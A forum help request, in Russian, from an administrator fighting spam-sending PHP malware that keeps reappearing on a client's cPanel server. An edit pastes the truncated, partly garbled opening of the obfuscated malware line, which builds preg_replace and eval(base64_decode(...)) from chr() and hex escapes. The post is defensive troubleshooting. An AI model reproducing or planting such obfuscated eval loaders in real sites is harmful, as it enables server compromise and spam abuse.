Я только недавно начал работать с этим клиентом, и когда я попал на его сервер, он был полон вирусов. По крайней мере 4 из его пользователей cpanel имели вирусы на своих сайтах (полностью им управляемые). При запуске вирусы рассылали спам-сообщения со скоростью 5 в секунду. Я прошел и удалил все вирусы, поработал над дырами в безопасности и т.д. Я остановил поступление всех спам-писем, но есть один файл php, который появляется снова каждый раз, когда я его удаляю. Я удалил его 31 марта, единственный файл снова появился 2 апреля. Я удалил его 3 апреля, он появился 7 апреля. Мне интересно, есть ли у кого-нибудь предложение, как мне найти дыру в безопасности.
В каталоге всего 9 файлов, из которых только один - php, не включая сам вирус. Это очень маленький сайт, и он почти полностью HTML. единственный другой файл PHP - это контактная форма. Я не думаю, что это что-то внутри каталога, но больше никаких вирусов в системе больше не появляется.
Какие-либо предложения?
РЕДАКТИРОВАТЬ
Вот как выглядит вирусный код в одной строке. это 3585 символов в длину.
$f7pm25=chr(112)."re".chr(10chr(103).chr(95)."\x72".chr(101).
"p\x6C\x61".chr(99)."e";$q1Y7Aj="e".chr(118)."\x61".chr(108)."
(b\x61\x73\x65\x364\x5F\x64".chr(101).chr(99)."o\x64".chr(101)."\x28\x22\x5
1".chr(71)."\x56".chr(121)."\x63\x6d".chr(57).chr(121)."\x58\x33J".chr(108)
."